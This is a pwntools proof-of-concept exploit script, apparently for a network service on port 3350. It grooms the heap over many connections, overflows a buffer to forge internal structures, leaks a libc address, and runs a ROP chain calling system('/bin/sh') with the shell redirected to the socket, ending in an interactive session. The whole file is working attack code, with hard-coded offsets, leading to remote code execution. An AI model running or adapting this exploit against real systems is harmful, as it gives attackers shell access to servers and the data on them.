from
pwn
import
*
# Interactive, stage-by-stage proof of concept against a service listening on
# 127.0.0.1:3350.  Each stage announces what it is about to do and then blocks
# in pause() so the run can be stepped through by hand.  Every numeric value
# below (chunk sizes, the 0x41xxxx / 0x407880 pointers, the libc offsets added
# to libc_base) is hard-coded and presumably only valid for one specific build
# of the target and its libc -- confirm before relying on any of them.  The
# observable footprint is a burst of connections to port 3350, each opened with
# a 4-byte version word followed by a big-endian 0x80000000 size word.
context.arch = 'amd64'
context.log_level = 'debug'
context.encoding = 'latin-1'

HOST = "127.0.0.1"
PORT = 3350

# Second 4-byte word sent on every fresh connection, right after the version.
SIZE_WORD = p32(0x80000000, endian='big')


def _connect():
    """Open one more TCP connection to HOST:PORT."""
    return remote(HOST, PORT)


def _step(msg):
    """Print the name of the next stage, then wait for the operator."""
    print(msg)
    pause()


def _send_header(conn, version):
    """Send the version word, then the size word, as two separate writes."""
    conn.send(p32(version))
    conn.send(SIZE_WORD)


p = _connect()
conns = [0] * 16            # slot placeholders; only some slots get a connection
for idx in range(10):
    conns[idx] = _connect()

_step("prepare to send version and size")
_send_header(p, 0)

_step("prepare to close 7 conns")
for idx in range(7):
    conns[idx + 1].close()

_step("prepare to overflow")
p.send(
    b"\x00" * 0x2000
    + p64(0xb1)
    + b"\x00" * 0xa8
    + p64(0x2b1)
    + p64(0x8)
    + p32(0x1)
    + p32(0x1)
    + p64(0x2)
    + p64(0x407880)
)

_step("prepare to close conns[0]")
conns[0].close()

_step("mov pointer")
p.send(b"\x00" * 0x280)

_step("prepare to retrive the trans and in_s back")
conns[11] = _connect()
print("overflow conns[11]")     # announced without a pause
_send_header(conns[11], 0)

_step("prepare to fake in_s")
p.send(p64(0) + p64(0x71) + p64(0x410c00) + p64(0x410c00) + p64(0x410bf8))

_step("prepare to fake another in_s and wait_s")
fake_in_s = flat([0x410d80, 0x410d80, 0x410d80, 0x2000] + [0] * 8)
fake_wait_s = (
    flat([0, 0x101, 0x410000, 0x4104F8, 0]).ljust(0x100, b'\x00')
    + p64(0)
    + p64(0x11)
    + p64(0)
    + p64(0x11)
)
conns[11].send(fake_in_s + fake_wait_s)

_step("prepare to close p")
p.close()

_step("prepare to create p")
p = _connect()
_send_header(p, 0x2222CCCC)

_step("prepare to create conns[12], and p's trans->in_s->end will just locate above conns[12]'s trans strucure")
conns[12] = _connect()
_send_header(conns[12], 0x2222CCCC)

_step("prepare to hijack in_s and wait_s")
payload = (
    b"\x00" * 0x2000
    + p64(0x2b1)
    + p64(0x9)
    + p32(1)
    + p32(1)
    + p64(0x2)
    + p64(0x0000000000407880)
    + p64(0)
    + p64(0xdeadbeef)
    + p64(0x410d80)
    + p64(0x410c00)
    + p64(0)
    + p64(0) * 2
    + p64(0x410c70)
)
p.send(payload)

_step("prepare to leak")
conns[12].recvn(0x148)      # the first 0x148 bytes are read and discarded
libc_base = u64(conns[12].recvn(0x8)) - 0xa5120

_step("prepare rop chain")
mov_rsp_rdx = libc_base + 0x000000000005a170
pop_rdi = libc_base + 0x000000000002a3e5
pop_rsi = libc_base + 0x000000000002be51      # computed but not used below
pop_rdx = libc_base + 0x000000000011f497      # computed but not used below
pop_rax = libc_base + 0x0000000000045eb0      # computed but not used below
syscall_ret = libc_base + 0x0000000000091396  # computed but not used below
system = libc_base + 0x00000000050d60
ropchain = flat([pop_rdi, 0x410e80, system]).ljust(0x100, b'\x00')
ropchain += b'/bin/sh 1>&7 0>&7'
conns[11].send(ropchain)

_step("hijack conns[12]'s trans_recv")
payload = b'\x00' * 0x220 + p64(mov_rsp_rdx)
p.send(payload)

_step("getshell")
conns[12].send(b'\x00')
success("libc_base: %s" % hex(libc_base))
p.interactive()